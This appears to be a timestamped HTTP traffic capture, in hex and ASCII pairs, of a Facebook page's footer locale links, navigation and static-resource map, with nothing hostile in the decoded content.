                                                                                                                                                                                    2023-01-05 07:59:13 UTC15370INData Raw: 74 61 2d 74 65 73 74 69 64 3d 22 70 61 67 65 5f 66 6f 6f 74 65 72 22 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 75 69 4c 69 73 74 20 6c 6f 63 61 6c 65 53 65 6c 65 63 74 6f 72 4c 69 73 74 20 5f 32 70 69 64 20 5f 35 30 39 2d 20 5f 34 6b 69 20 5f 36 2d 68 20 5f 36 2d 6a 20 5f 36 2d 69 22 20 64 61 74 61 2d 6e 6f 63 6f 6f 6b 69 65 73 3d 22 31 22 3e 3c 6c 69 3e 45 6e 67 6c 69 73 68 20 28 55 53 29 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 6c 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 2d 64 65 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61
                                                                                                                                                                                    Data Ascii: ta-testid="page_footer"><ul class="uiList localeSelectorList _2pid _509- _4ki _6-h _6-j _6-i" data-nocookies="1"><li>English (US)</li><li><a class="_sv4" dir="ltr" href="https://de-de.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmana
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15371INData Raw: 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 75 30 30 32 35 32 46 61 64 73 5c 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 32 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 49 74 61 6c 69 61 6e 22 3e 49 74 61 6c 69 61 6e 6f 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 6c 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 74 2d 70 74 2e 66 61 63 65
                                                                                                                                                                                    Data Ascii: 0253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 2); return false;" title="Italian">Italiano</a></li><li><a class="_sv4" dir="ltr" href="https://pt-pt.face
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15373INData Raw: 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 65 73 2d 6c 61 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 75 30 30 32 35 32 46 61 64 73 5c 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 35 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 53 70 61 6e
                                                                                                                                                                                    Data Ascii: uot;en_US&quot;, &quot;https:\/\/es-la.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 5); return false;" title="Span
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15374INData Raw: 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 68 69 5f 49 4e 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 68 69 2d 69 6e 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 75 30 30 32 35 32 46 61 64 73 5c 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74
                                                                                                                                                                                    Data Ascii: t;IntlUtils&quot;).setCookieLocale(&quot;hi_IN&quot;, &quot;en_US&quot;, &quot;https:\/\/hi-in.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15376INData Raw: 6e 20 55 70 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 6c 6f 67 69 6e 2f 22 20 74 69 74 6c 65 3d 22 4c 6f 67 20 69 6e 74 6f 20 46 61 63 65 62 6f 6f 6b 22 3e 4c 6f 67 20 49 6e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 65 73 73 65 6e 67 65 72 2e 63 6f 6d 2f 22 20 74 69 74 6c 65 3d 22 43 68 65 63 6b 20 6f 75 74 20 4d 65 73 73 65 6e 67 65 72 2e 22 3e 4d 65 73 73 65 6e 67 65 72 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 6c 69 74 65 2f 22 20 74 69 74 6c 65 3d 22 46 61 63 65 62 6f 6f 6b 20 4c 69 74 65 20 66 6f 72 20 41 6e 64 72 6f 69 64 2e 22 3e 46 61 63 65 62 6f 6f 6b 20 4c 69 74 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70
                                                                                                                                                                                    Data Ascii: n Up</a></li><li><a href="/login/" title="Log into Facebook">Log In</a></li><li><a href="https://messenger.com/" title="Check out Messenger.">Messenger</a></li><li><a href="/lite/" title="Facebook Lite for Android.">Facebook Lite</a></li><li><a href="http
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15377INData Raw: 6f 72 79 2e 22 3e 53 65 72 76 69 63 65 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 76 6f 74 69 6e 67 69 6e 66 6f 72 6d 61 74 69 6f 6e 63 65 6e 74 65 72 2f 3f 65 6e 74 72 79 5f 70 6f 69 6e 74 3d 63 32 6c 30 5a 51 25 33 44 25 33 44 22 20 74 69 74 6c 65 3d 22 53 65 65 20 74 68 65 20 56 6f 74 69 6e 67 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 43 65 6e 74 65 72 2e 22 3e 56 6f 74 69 6e 67 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 43 65 6e 74 65 72 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 70 72 69 76 61 63 79 2f 70 6f 6c 69 63 79 2f 3f 65 6e 74 72 79 5f 70 6f 69 6e 74 3d 66 61 63 65 62 6f 6f 6b 5f 70 61 67 65 5f 66 6f 6f 74 65 72 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 68 6f 77 20 77 65 20 63 6f 6c 6c 65 63
                                                                                                                                                                                    Data Ascii: ory.">Services</a></li><li><a href="/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D" title="See the Voting Information Center.">Voting Information Center</a></li><li><a href="/privacy/policy/?entry_point=facebook_page_footer" title="Learn how we collec
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15379INData Raw: 31 22 20 68 72 65 66 3d 22 2f 70 6f 6c 69 63 69 65 73 3f 72 65 66 3d 70 66 22 20 61 63 63 65 73 73 6b 65 79 3d 22 39 22 20 74 69 74 6c 65 3d 22 52 65 76 69 65 77 20 6f 75 72 20 74 65 72 6d 73 20 61 6e 64 20 70 6f 6c 69 63 69 65 73 2e 22 3e 54 65 72 6d 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 0d 0a
                                                                                                                                                                                    Data Ascii: 1" href="/policies?ref=pf" accesskey="9" title="Review our terms and policies.">Terms</a></li><li><a
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15379INData Raw: 64 36 65 35 0d 0a 68 72 65 66 3d 22 2f 68 65 6c 70 2f 3f 72 65 66 3d 70 66 22 20 61 63 63 65 73 73 6b 65 79 3d 22 30 22 20 74 69 74 6c 65 3d 22 56 69 73 69 74 20 6f 75 72 20 48 65 6c 70 20 43 65 6e 74 65 72 2e 22 3e 48 65 6c 70 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 65 6c 70 2f 36 33 37 32 30 35 30 32 30 38 37 38 35 30 34 22 20 74 69 74 6c 65 3d 22 56 69 73 69 74 20 6f 75 72 20 43 6f 6e 74 61 63 74 20 55 70 6c 6f 61 64 69 6e 67 20 26 61 6d 70 3b 20 4e 6f 6e 2d 55 73 65 72 73 20 4e 6f 74 69 63 65 2e 22 3e 43 6f 6e 74 61 63 74 20 55 70 6c 6f 61 64 69 6e 67 20 26 61 6d 70 3b 20 4e 6f 6e 2d 55 73 65 72 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 61 63 63 65 73 73 6b 65 79 3d 22 36 22 20 63 6c 61 73 73 3d 22 61 63 63 65 73
                                                                                                                                                                                    Data Ascii: d6e5href="/help/?ref=pf" accesskey="0" title="Visit our Help Center.">Help</a></li><li><a href="help/637205020878504" title="Visit our Contact Uploading &amp; Non-Users Notice.">Contact Uploading &amp; Non-Users</a></li><li><a accesskey="6" class="acces
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15380INData Raw: 68 22 3a 22 41 54 36 67 75 43 57 31 65 79 49 6b 4f 56 31 45 69 46 41 22 7d 2c 22 31 34 30 31 30 36 30 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 35 61 65 74 4e 35 47 62 33 72 65 49 58 56 43 4d 4d 22 7d 2c 22 31 35 39 36 30 36 33 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37 4a 48 75 44 57 74 61 4f 71 52 75 42 55 75 45 38 22 7d 2c 22 31 37 32 32 30 31 34 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 5f 4d 35 67 70 63 36 52 4c 72 48 6a 63 6e 66 6b 22 7d 2c 22 31 37 37 38 33 30 32 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 35 66 69 73 5a 68 6d 63 32 58 39 32 45 54 39 45 22 7d 2c 22 31 38 34 30 38
                                                                                                                                                                                    Data Ascii: h":"AT6guCW1eyIkOV1EiFA"},"1401060":{"result":true,"hash":"AT5aetN5Gb3reIXVCMM"},"1596063":{"result":false,"hash":"AT7JHuDWtaOqRuBUuE8"},"1722014":{"result":false,"hash":"AT6_M5gpc6RLrHjcnfk"},"1778302":{"result":false,"hash":"AT65fisZhmc2X92ET9E"},"18408
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15382INData Raw: 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 4d 37 5c 2f 6a 6c 43 52 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 46 5c 2f 72 5c 2f 50 74 6d 66 78 4c 56 77 41 62 37 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 74 74 58 70 77 70 52 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 51 5c 2f 72 5c 2f 76 45 46 4e 4e 5a 49 39 74 71 64 2e 6a 73 3f 5f 6e 63 5f 78 3d 49
                                                                                                                                                                                    Data Ascii: nc_x=Ij3Wp8lg5Kz","nc":1},"M7\/jlCR":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yF\/r\/PtmfxLVwAb7.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"ttXpwpR":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yQ\/r\/vEFNNZI9tqd.js?_nc_x=I
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15383INData Raw: 2f 76 33 69 38 4a 46 34 5c 2f 79 36 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 4d 6e 42 39 33 66 31 5f 31 31 4e 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 52 35 77 31 72 43 4a 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 46 5c 2f 72 5c 2f 70 35 35 48 66 58 57 5f 5f 6d 4d 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 62 35 68 5c 2f 73 77 4c 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73
                                                                                                                                                                                    Data Ascii: /v3i8JF4\/y6\/l\/en_US\/MnB93f1_11N.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"R5w1rCJ":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yF\/r\/p55HfXW__mM.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"b5h\/swL":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rs
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15384INData Raw: 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 41 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 74 43 6f 36 37 4a 6e 6f 68 34 73 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 4f 4b 38 67 5c 2f 69 54 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 67 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 59 45 72 4f 6c 73 70 79 6f 34 6d 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63
                                                                                                                                                                                    Data Ascii: "type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yA\/l\/0,cross\/tCo67Jnoh4s.css?_nc_x=Ij3Wp8lg5Kz","nc":1},"OK8g\/iT":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yg\/l\/0,cross\/YErOlspyo4m.css?_nc_x=Ij3Wp8lg5Kz","nc
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15386INData Raw: 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 49 5c 2f 72 5c 2f 75 47 75 65 39 76 73 30 47 7a 54 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 45 7a 36 31 41 33 51 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 59 5c 2f 72 5c 2f 63 4d 2d 56 51 4d 30 77 75 39 78 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 53 5a 37 44 71 43 42 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74
                                                                                                                                                                                    Data Ascii: dn.net\/rsrc.php\/v3\/yI\/r\/uGue9vs0GzT.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"Ez61A3Q":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yY\/r\/cM-VQM0wu9x.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"SZ7DqCB":{"type":"css","src":"https:\/\/static.xx.fbcdn.net
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15387INData Raw: 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 74 5c 2f 72 5c 2f 5f 39 5f 6b 67 4b 78 6d 44 73 4a 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 5a 6e 78 5a 56 41 63 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 69 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 4f 37 57 59 5a 6b 66 5f 64 32 4f 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 66 61 5a 44 6d 79 4f 22 3a 7b 22 74 79
                                                                                                                                                                                    Data Ascii: "js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yt\/r\/_9_kgKxmDsJ.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"ZnxZVAc":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yi\/l\/0,cross\/O7WYZkf_d2O.css?_nc_x=Ij3Wp8lg5Kz","nc":1},"faZDmyO":{"ty
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15389INData Raw: 2f 30 6d 4a 44 4f 57 49 43 6a 6a 36 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 2b 2b 57 65 7a 75 52 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 4c 33 69 34 5c 2f 79 5a 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 36 55 56 77 5a 4b 46 32 34 55 55 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 2b 41 6f 77 46 51 4c 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 4c 6a
                                                                                                                                                                                    Data Ascii: /0mJDOWICjj6.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"++WezuR":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iL3i4\/yZ\/l\/en_US\/6UVwZKF24UU.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"+AowFQL":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iLj
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15390INData Raw: 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 74 72 35 38 44 58 6c 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 57 5c 2f 72 5c 2f 4a 32 73 4c 75 71 33 52 43 58 30 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 63 42 6e 6d 6b 35 31 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 4c 70 50 34 5c 2f 79 7a 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 58 52 70 49 39 46 55 48 72 47 69 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33
                                                                                                                                                                                    Data Ascii: 5Kz","nc":1},"tr58DXl":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yW\/r\/J2sLuq3RCX0.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"cBnmk51":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iLpP4\/yz\/l\/en_US\/XRpI9FUHrGi.js?_nc_x=Ij3
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15392INData Raw: 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 55 5c 2f 72 5c 2f 4a 6c 71 6f 4f 75 54 6e 66 4e 6b 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 34 57 75 33 4b 42 51 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 79 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 75 65 4a 2d 77 49 77 72 69 76 4b 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 30 43 4e 77 48 33 6f 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c
                                                                                                                                                                                    Data Ascii: tatic.xx.fbcdn.net\/rsrc.php\/v3\/yU\/r\/JlqoOuTnfNk.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"4Wu3KBQ":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yy\/l\/0,cross\/ueJ-wIwrivK.css?_nc_x=Ij3Wp8lg5Kz","nc":1},"0CNwH3o":{"type":"js","src":"https:\
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15393INData Raw: 22 6e 63 22 3a 31 7d 2c 22 53 57 78 33 79 4e 76 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 37 5c 2f 72 5c 2f 67 5f 5f 65 56 35 4f 58 53 58 6c 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 6f 45 34 44 6f 66 54 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 4a 5c 2f 72 5c 2f 45 65 6a 41 67 6e 48 55 61 64 34 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d
                                                                                                                                                                                    Data Ascii: "nc":1},"SWx3yNv":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y7\/r\/g__eV5OXSXl.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"oE4DofT":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yJ\/r\/EejAgnHUad4.js?_nc_x=Ij3Wp8lg5Kz","nc":1}
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15395INData Raw: 22 66 42 4e 79 7a 64 34 22 2c 22 2b 43 45 6a 62 42 79 22 2c 22 53 67 44 30 47 31 71 22 2c 22 4f 52 66 46 36 77 70 22 2c 22 31 34 37 76 78 35 41 22 2c 22 65 33 64 79 57 61 46 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 5d 2c 22 72 22 3a 5b 22 75 5a 6e 59 6e 6a 41 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 44 4f 4d 22 3a 7b 22 72 22 3a 5b 22 66 42 4e 79 7a 64 34 22 2c 22 2b 43 45 6a 62 42 79 22 2c 22 65 33 64 79 57 61 46 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 46 6f 72 6d 22 3a 7b 22 72 22 3a 5b 22 66 42 4e 79 7a 64 34 22 2c 22 75 5a 6e 59 6e 6a 41 22 2c 22 2b 43 45 6a 62 42 79 22 2c 22 65 33 64 79 57 61 46 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 46 6f 72 6d 53
